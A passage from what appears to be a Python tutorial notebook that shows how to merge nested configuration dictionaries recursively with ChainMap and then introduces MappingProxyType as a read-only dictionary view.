 'logs': {'format': '%(asctime)s: %(levelname)s: %(clientip)s %(user)s '
                    '%(message)s',
          'level': 'info'}}


In [4]:
pprint(load_settings('dev'))

{'data': {'input_root': '/dev/path/inputs',
          'numerics': {'type': 'float'},
          'operators': {'add': '__add__'},
          'output_root': '/dev/path/outputs'},
 'database': {'pwd': 'test', 'user': 'test'},
 'logs': {'format': '%(asctime)s: %(levelname)s: %(clientip)s %(user)s '
                    '%(filename)s %(funcName)s %(message)s',
          'level': 'trace'}}


In [5]:
pprint(load_settings('prod'))

{'data': {'input_root': '$DATA_INPUT_PATH', 'output_root': '$DATA_OUTPUT_PATH'},
 'database': {'pwd': '$PG_PWD', 'user': '$PG_USER'}}


OK, so our function seems to work fine.
Now time to "combine" our settings - let's try this simple approach first.

Spoiler alert: this won't work as expected!

In [6]:
from collections import ChainMap

def settings(env):
    # combine common.json and <env>.json, with env settings taking precedence
    common_settings = load_settings('common')
    env_settings = load_settings(env)
    return ChainMap(env_settings, common_settings)

In [7]:
dev = settings('dev')

In [8]:
for k, v in dev.items():
    print(k, ':', v)

data : {'input_root': '/dev/path/inputs', 'output_root': '/dev/path/outputs', 'numerics': {'type': 'float'}, 'operators': {'add': '__add__'}}
logs : {'level': 'trace', 'format': '%(asctime)s: %(levelname)s: %(clientip)s %(user)s %(filename)s %(funcName)s %(message)s'}
database : {'user': 'test', 'pwd': 'test'}


**What happened to the values that were in `common`?**

For example, the `database` `port` is missing.

This does not work as intended because of the sub-dictionaries. A `ChainMap` lookup returns the value from the first mapping that contains the key, so the `database` dictionary we get back is the one from `dev`, and not a "combined" dictionary.

`ChainMap` is not recursive, so this is not going to work for us as it stands.
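We can reproduce the problem with two small in-memory dictionaries, no files needed. This is just a sketch with made-up values (the names `common`, `dev` and `chain` are only for illustration):

```python
from collections import ChainMap

common = {'database': {'port': 5432, 'db_name': 'deepdive'}}
dev = {'database': {'user': 'test'}}

chain = ChainMap(dev, common)

# the lookup stops at the first mapping that has the key 'database',
# so we get dev's sub-dictionary as-is, with nothing merged in from common
print(chain['database'])
print('port' in chain['database'])
```

The top-level keys are chained, but each value is returned whole from whichever mapping has it first.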

We need to use a recursive approach to handle any amount of nesting.

Let's think how we would do this for a single level.

When we chain two dictionaries together, we have to replace any sub-dictionary with a chain of the corresponding sub-dictionaries from each dictionary in the chain. Fortunately our chain only has two dictionaries, since we only deal with `common` and one environment file (`dev`, `prod`, or whatever environment names we want to support).

So if a key in `dev` (for example) has a dictionary value, we need to chain that sub-dictionary too. And if any of the keys in the chained sub-dictionary contain nested dictionaries, we need to chain those as well.

In [9]:
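def chain_recursive(d1, d2):
    # d1 takes precedence over d2
    chain = ChainMap(d1, d2)
    for k, v in d1.items():
        # only chain when both sides hold a dictionary for this key
        if isinstance(v, dict) and isinstance(d2.get(k), dict):
            # ChainMap writes go to the first mapping, so this replaces d1[k]
            chain[k] = chain_recursive(v, d2[k])
    return chain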
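One thing to be aware of: assigning to `chain[k]` writes into the first mapping of the chain, so `chain_recursive` modifies the `d1` dictionary we pass in (its nested dictionaries get replaced by `ChainMap` objects). That is fine here since we load fresh dictionaries from the files each time. If you would rather leave the inputs untouched, one possible variant is sketched below. The name `chain_recursive_pure` is hypothetical, and the trade-off is that it builds a new front dictionary at each level (holding references to the same values, not copies of them).

```python
from collections import ChainMap

def chain_recursive_pure(d1, d2):
    # hypothetical non-mutating variant: build a new front mapping
    # instead of writing the nested chains back into d1
    front = {}
    for k, v in d1.items():
        if isinstance(v, dict) and isinstance(d2.get(k), dict):
            front[k] = chain_recursive_pure(v, d2[k])
        else:
            front[k] = v
    return ChainMap(front, d2)

# made-up sample data
common = {'database': {'port': 5432}, 'logs': {'level': 'info'}}
env = {'database': {'user': 'test'}}

merged = chain_recursive_pure(env, common)
print(merged['database']['port'], merged['database']['user'])
print(merged['logs']['level'])
print(env)  # still a plain nested dictionary
```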

In [10]:
d1 = load_settings('common')
d2 = load_settings('dev')

In [11]:
dev = chain_recursive(d2, d1)

In [12]:
pprint(dev)

ChainMap({'data': ChainMap({'input_root': '/dev/path/inputs',
                            'numerics': ChainMap({'type': 'float'},
                                                 {'precision': 6,
                                                  'type': 'Decimal'}),
                            'operators': {'add': '__add__'},
                            'output_root': '/dev/path/outputs'},
                           {'input_root': '/default/path/inputs',
                            'numerics': {'precision': 6, 'type': 'Decimal'},
                            'output_root': '/default/path/outputs'}),
          'database': ChainMap({'pwd': 'test', 'user': 'test'},
                               {'db_name': 'deepdive',
                                'port': 5432,
                                'schema': 'public'}),
          'logs': ChainMap({'format': '%(asctime)s: %(levelname)s: '
                                      '%(clientip)s %(user)s %(filename)s '
                                      ... (output truncated)

This means that we can look up the log level, for example, which we know should be `trace` for our development environment:

In [13]:
dev['logs']['level']

'trace'

If instead we load up our production environment:

In [14]:
d3 = load_settings('prod')
prod = chain_recursive(d3, d1)

In [15]:
prod['logs']['level']

'info'

and the database port, from the common settings:

In [16]:
prod['database']['port']

5432

but, we have the override for the user:

In [17]:
prod['database']['user']

'$PG_USER'

So now, let's package this up in a neat function for our users:

In [18]:
def settings(env):
    common_settings = load_settings('common')
    env_settings = load_settings(env)
    return chain_recursive(env_settings, common_settings)

In [19]:
prod = settings('prod')

In [20]:
prod['database']['user']

'$PG_USER'

In [21]:
dev = settings('dev')
dev['logs']['level']

'trace'

Let's also check some deeper nested dictionaries:

In [22]:
prod['data']['numerics']['type']

'Decimal'

In [23]:
dev['data']['numerics']['type']

'float'

In [24]:
dev['data']['operators']

{'add': '__add__'}

So this seems to work just fine. You may want to further refine this to merge list type values as well - for example, `key1: [1, 2, 3]` in `common` and `key1: [3, 4, 5]` in `dev` might result in `key1: [1, 2, 3, 4, 5]`. This is a rarer requirement, but do note that the solution I present here will simply replace the entire list with what is in the `dev` file, not merge the two lists.
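If you do want to merge lists, here is one way it might be sketched. This makes several assumptions that you may want to change: the items from `common` come first, duplicates are dropped, and the order is otherwise preserved. The names `merge_lists` and `chain_recursive_with_lists` are hypothetical, and unlike the pure `ChainMap` approach this does create a new list for each merged key.

```python
from collections import ChainMap

def merge_lists(base, override):
    # keep the base items, then append override items not already present
    merged = list(base)
    for item in override:
        if item not in merged:
            merged.append(item)
    return merged

def chain_recursive_with_lists(d1, d2):
    # d1 takes precedence over d2, except that lists are merged
    front = {}
    for k, v in d1.items():
        other = d2.get(k)
        if isinstance(v, dict) and isinstance(other, dict):
            front[k] = chain_recursive_with_lists(v, other)
        elif isinstance(v, list) and isinstance(other, list):
            front[k] = merge_lists(other, v)
        else:
            front[k] = v
    return ChainMap(front, d2)

# made-up sample data
common = {'key1': [1, 2, 3], 'nested': {'items': ['a']}}
dev = {'key1': [3, 4, 5], 'nested': {'items': ['b']}}

result = chain_recursive_with_lists(dev, common)
print(result['key1'])
print(result['nested']['items'])
```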

# Section 11 - Extras

##  MappingProxyType

The mapping proxy type is an easy way to create a read-only **view** of any dictionary.

This can be handy if you want to pass a dictionary around, and have that view reflect the underlying dictionary (even if it is mutated), but not allow the receiver to modify the dictionary through it.

In fact, this is used by classes all the time:

In [1]:
class Test:
    a = 100

In [2]:
Test.__dict__

mappingproxy({'__module__': '__main__',
              'a': 100,
              '__dict__': <attribute '__dict__' of 'Test' objects>,
              '__weakref__': <attribute '__weakref__' of 'Test' objects>,
              '__doc__': None})

As you can see, what is returned here is not actually a `dict` object, but a `mappingproxy`.
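Here is a small sketch of what that means in practice: we cannot write to the class namespace through `__dict__`, but we can still change class attributes the normal way, and the proxy reflects the change.

```python
from types import MappingProxyType

class Test:
    a = 100

# the class namespace is exposed through a read-only proxy
print(type(Test.__dict__) is MappingProxyType)

try:
    Test.__dict__['a'] = 200
except TypeError as ex:
    message = str(ex)
    print('TypeError:', message)

# going through setattr (or Test.a = 200) works fine
setattr(Test, 'a', 200)
print(Test.__dict__['a'])
```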

To create a mapping proxy from a dictionary we use the `MappingProxyType` from the `types` module:

In [3]:
from types import MappingProxyType

In [4]:
d = {'a': 1, 'b': 2}

In [5]:
mp = MappingProxyType(d)

This mapping proxy still behaves like a dictionary:

In [6]:
list(mp.keys())

['a', 'b']

In [7]:
list(mp.values())

[1, 2]

In [8]:
list(mp.items())

[('a', 1), ('b', 2)]

In [9]:
mp.get('a', 'not found')

1

In [10]:
mp.get('c', 'not found')

'not found'

But we cannot mutate it:

In [11]:
try:
    mp['a'] = 100
except TypeError as ex:
    print('TypeError: ', ex)

TypeError:  'mappingproxy' object does not support item assignment


On the other hand, if the underlying dictionary is mutated:

In [12]:
d['a'] = 100
d['c'] = 'new item'

In [13]:
d

{'a': 100, 'b': 2, 'c': 'new item'}

In [14]:
mp

mappingproxy({'a': 100, 'b': 2, 'c': 'new item'})

And as you can see, the mapping proxy "sees" the changes in the underlying dictionary - so it behaves like a view, in the same way `keys()`, `values()` and `items()` do.
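To make the comparison with dictionary views concrete, here is a short sketch where both a `keys()` view and a mapping proxy are created *before* the dictionary is mutated (the variable names are just for illustration):

```python
from types import MappingProxyType

d = {'a': 1, 'b': 2}
keys = d.keys()            # a dictionary view
mp = MappingProxyType(d)   # a read-only proxy

d['c'] = 3                 # mutate the underlying dictionary

# both were created before the mutation, and both reflect the new key
print(list(keys))
print(list(mp))
```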

You can obtain a **shallow** copy of the underlying dictionary by calling the proxy's `copy()` method:

In [15]:
cp = mp.copy()

In [16]:
cp

{'a': 100, 'b': 2, 'c': 'new item'}

As you can see, `cp` is a plain `dict`.
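Keep in mind that "shallow" applies both to the copy and to the read-only protection itself. The sketch below uses a made-up dictionary with a nested list to show this: the copy shares the nested list with the original, and the proxy blocks item assignment but not mutation of the values it hands back.

```python
from types import MappingProxyType

d = {'a': 100, 'tags': ['x', 'y']}
mp = MappingProxyType(d)
cp = mp.copy()

cp['a'] = 0              # only the copy changes
cp['tags'].append('z')   # the nested list is shared with d

# the proxy blocks item assignment, but not mutation of a mutable value
mp['tags'].append('w')

print(d)
print(cp)
```

If you need the nested values protected as well, you would have to wrap or copy them separately.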